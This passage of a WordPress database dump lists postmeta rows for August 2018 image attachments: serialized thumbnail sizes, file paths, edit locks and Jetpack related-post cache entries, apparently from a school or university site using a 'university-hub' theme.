(7933, 3554, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/37687818_635338383509020_5955663959171268608_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"37687818_635338383509020_5955663959171268608_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"37687818_635338383509020_5955663959171268608_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"37687818_635338383509020_5955663959171268608_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"37687818_635338383509020_5955663959171268608_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"37687818_635338383509020_5955663959171268608_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7934, 3553, '_thumbnail_id', '3554'),
(7938, 3553, '_hide_featured', NULL),
(7939, 3553, '_wpas_done_all', '1'),
(7940, 3557, '_edit_lock', '1533266700:3'),
(7941, 3557, '_edit_last', '3'),
(7942, 3558, '_wp_attached_file', '2018/08/37726933_636217240087801_1917527443954991104_n.jpg'),
(7943, 3558, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:638;s:4:\"file\";s:58:\"2018/08/37726933_636217240087801_1917527443954991104_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"37726933_636217240087801_1917527443954991104_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"37726933_636217240087801_1917527443954991104_n-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"37726933_636217240087801_1917527443954991104_n-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"37726933_636217240087801_1917527443954991104_n-400x266.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:266;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7944, 3557, '_thumbnail_id', '3558'),
(7948, 3557, '_hide_featured', NULL),
(7949, 3557, '_wpas_done_all', '1'),
(7950, 3561, '_edit_lock', '1533267175:3'),
(7951, 3561, '_edit_last', '3'),
(7952, 3562, '_wp_attached_file', '2018/08/3-8-2561-10-30-44.jpg'),
(7953, 3562, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:507;s:6:\"height\";i:657;s:4:\"file\";s:29:\"2018/08/3-8-2561-10-30-44.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"3-8-2561-10-30-44-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"3-8-2561-10-30-44-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"3-8-2561-10-30-44-232x300.jpg\";s:5:\"width\";i:232;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7954, 3563, '_wp_attached_file', '2018/08/37792871_637302969979228_6037474887067500544_o.jpg'),
(7955, 3563, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1035;s:4:\"file\";s:58:\"2018/08/37792871_637302969979228_6037474887067500544_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"37792871_637302969979228_6037474887067500544_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"37792871_637302969979228_6037474887067500544_o-300x160.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:160;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"37792871_637302969979228_6037474887067500544_o-768x409.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:409;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"37792871_637302969979228_6037474887067500544_o-1024x545.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:545;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"37792871_637302969979228_6037474887067500544_o-400x213.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:213;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7956, 3561, '_thumbnail_id', '3563'),
(7960, 3561, '_hide_featured', NULL),
(7961, 3561, '_wpas_done_all', '1'),
(7962, 3540, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575639038;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4961;}i:1;a:1:{s:2:\"id\";i:4033;}i:2;a:1:{s:2:\"id\";i:4101;}}}}'),
(7963, 3553, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575627692;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5378;}i:1;a:1:{s:2:\"id\";i:6119;}i:2;a:1:{s:2:\"id\";i:4033;}}}}'),
(7964, 3561, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575347560;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5985;}i:1;a:1:{s:2:\"id\";i:5988;}i:2;a:1:{s:2:\"id\";i:6324;}}}}'),
(7965, 3557, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575422626;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:4887;}i:1;a:1:{s:2:\"id\";i:4884;}i:2;a:1:{s:2:\"id\";i:4746;}}}}'),
(7966, 3545, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575533146;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:6141;}i:1;a:1:{s:2:\"id\";i:6308;}i:2;a:1:{s:2:\"id\";i:4017;}}}}'),
(7967, 3549, '_jetpack_related_posts_cache', 'a:1:{s:32:\"6aa6dc5687f13a41f72f011e50696210\";a:2:{s:7:\"expires\";i:1575681635;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:5926;}i:1;a:1:{s:2:\"id\";i:6138;}i:2;a:1:{s:2:\"id\";i:6136;}}}}'),
(7970, 3567, '_wp_attached_file', '2018/08/20180806_200900.jpg'),
(7971, 3567, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1079;s:6:\"height\";i:1566;s:4:\"file\";s:27:\"2018/08/20180806_200900.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"20180806_200900-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"20180806_200900-207x300.jpg\";s:5:\"width\";i:207;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"20180806_200900-768x1115.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:1115;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"20180806_200900-706x1024.jpg\";s:5:\"width\";i:706;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:27:\"20180806_200900-207x300.jpg\";s:5:\"width\";i:207;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(7972, 3568, '_edit_lock', '1533604940:3'),
(7973, 3568, '_edit_last', '3'),
(7974, 3569, '_wp_attached_file', '2018/08/7-8-2561-8-23-53.jpg'),
(7975, 3569, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:405;s:6:\"height\";i:632;s:4:\"file\";s:28:\"2018/08/7-8-2561-8-23-53.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"7-8-2561-8-23-53-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-8-2561-8-23-53-192x300.jpg\";s:5:\"width\";i:192;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"7-8-2561-8-23-53-192x300.jpg\";s:5:\"width\";i:192;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7976, 3570, '_wp_attached_file', '2018/08/38457991_645273379182187_3229220970233331712_o.jpg'),
(7977, 3570, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:1944;s:6:\"height\";i:1296;s:4:\"file\";s:58:\"2018/08/38457991_645273379182187_3229220970233331712_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"38457991_645273379182187_3229220970233331712_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"38457991_645273379182187_3229220970233331712_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"38457991_645273379182187_3229220970233331712_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:59:\"38457991_645273379182187_3229220970233331712_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"38457991_645273379182187_3229220970233331712_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7978, 3568, '_thumbnail_id', '3570'),
(7982, 3568, '_hide_featured', NULL),
(7983, 3568, '_wpas_done_all', '1'),
(7986, 3573, '_edit_lock', '1533605133:3'),
(7987, 3573, '_edit_last', '3'),
(7988, 3574, '_wp_attached_file', '2018/08/38490607_648356858873839_3582132669099540480_n.jpg'),
(7989, 3574, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:58:\"2018/08/38490607_648356858873839_3582132669099540480_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"38490607_648356858873839_3582132669099540480_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"38490607_648356858873839_3582132669099540480_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"38490607_648356858873839_3582132669099540480_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"38490607_648356858873839_3582132669099540480_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(7990, 3573, '_thumbnail_id', '3574'),
(7994, 3573, '_hide_featured', NULL),
(7995, 3573, '_wpas_done_all', '1'),
(7996, 3577, '_edit_lock', '1533605303:3'),
(7997, 3577, '_edit_last', '3'),
(7998, 3578, '_wp_attached_file', '2018/08/38696070_2166176236980810_6421998545959649280_o.jpg'),
(7999, 3578, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:2048;s:6:\"height\";i:1365;s:4:\"file\";s:59:\"2018/08/38696070_2166176236980810_6421998545959649280_o.jpg\";s:5:\"sizes\";a:5:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:59:\"38696070_2166176236980810_6421998545959649280_o-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:59:\"38696070_2166176236980810_6421998545959649280_o-300x200.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:59:\"38696070_2166176236980810_6421998545959649280_o-768x512.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:60:\"38696070_2166176236980810_6421998545959649280_o-1024x683.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:59:\"38696070_2166176236980810_6421998545959649280_o-400x267.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:267;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8000, 3577, '_thumbnail_id', '3578'),
(8004, 3577, '_hide_featured', NULL),
(8005, 3577, '_wpas_done_all', '1'),
(8006, 3581, '_edit_lock', '1533605490:3'),
(8007, 3581, '_edit_last', '3'),
(8008, 3582, '_wp_attached_file', '2018/08/7-8-2561-8-34-11.jpg'),
(8009, 3582, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:456;s:6:\"height\";i:622;s:4:\"file\";s:28:\"2018/08/7-8-2561-8-34-11.jpg\";s:5:\"sizes\";a:3:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"7-8-2561-8-34-11-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-8-2561-8-34-11-220x300.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"7-8-2561-8-34-11-220x300.jpg\";s:5:\"width\";i:220;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8010, 3583, '_wp_attached_file', '2018/08/38497318_648474705528721_2444001717600124928_n.jpg'),
(8011, 3583, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:381;s:4:\"file\";s:58:\"2018/08/38497318_648474705528721_2444001717600124928_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"38497318_648474705528721_2444001717600124928_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"38497318_648474705528721_2444001717600124928_n-300x119.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:119;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"38497318_648474705528721_2444001717600124928_n-768x305.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:305;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"38497318_648474705528721_2444001717600124928_n-400x159.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:159;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8012, 3581, '_thumbnail_id', '3583'),
(8016, 3581, '_hide_featured', NULL),
(8017, 3581, '_wpas_done_all', '1'),
(8018, 3586, '_edit_lock', '1533607206:3'),
(8019, 3586, '_edit_last', '3'),
(8020, 3587, '_wp_attached_file', '2018/08/38600202_648599425516249_7235743472429301760_n.jpg'),
(8021, 3587, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:960;s:6:\"height\";i:720;s:4:\"file\";s:58:\"2018/08/38600202_648599425516249_7235743472429301760_n.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:58:\"38600202_648599425516249_7235743472429301760_n-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:58:\"38600202_648599425516249_7235743472429301760_n-300x225.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:225;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:58:\"38600202_648599425516249_7235743472429301760_n-768x576.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:58:\"38600202_648599425516249_7235743472429301760_n-400x300.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8022, 3586, '_thumbnail_id', '3587'),
(8026, 3586, '_hide_featured', NULL),
(8027, 3586, '_wpas_done_all', '1'),
(8028, 3591, '_wp_attached_file', '2018/08/7-8-2561-9-24-38.jpg'),
(8029, 3591, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:952;s:6:\"height\";i:624;s:4:\"file\";s:28:\"2018/08/7-8-2561-9-24-38.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-24-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-24-38-300x197.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:197;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-24-38-768x503.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:503;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-24-38-400x262.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:262;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8030, 3592, '_wp_attached_file', '2018/08/7-8-2561-9-25-10.jpg'),
(8031, 3592, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:951;s:6:\"height\";i:619;s:4:\"file\";s:28:\"2018/08/7-8-2561-9-25-10.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-25-10-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-25-10-300x195.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:195;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-25-10-768x500.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:500;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:28:\"7-8-2561-9-25-10-400x260.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:260;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(8032, 3595, '_wp_attached_file', '2018/08/7-8-2561-10-01-38.jpg'),
(8033, 3595, '_wp_attachment_metadata', 'a:5:{s:5:\"width\";i:953;s:6:\"height\";i:307;s:4:\"file\";s:29:\"2018/08/7-8-2561-10-01-38.jpg\";s:5:\"sizes\";a:4:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-01-38-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"7-8-2561-10-01-38-300x97.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:97;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-01-38-768x247.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:247;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"university-hub-thumb\";a:4:{s:4:\"file\";s:29:\"7-8-2561-10-01-38-400x129.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:129;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
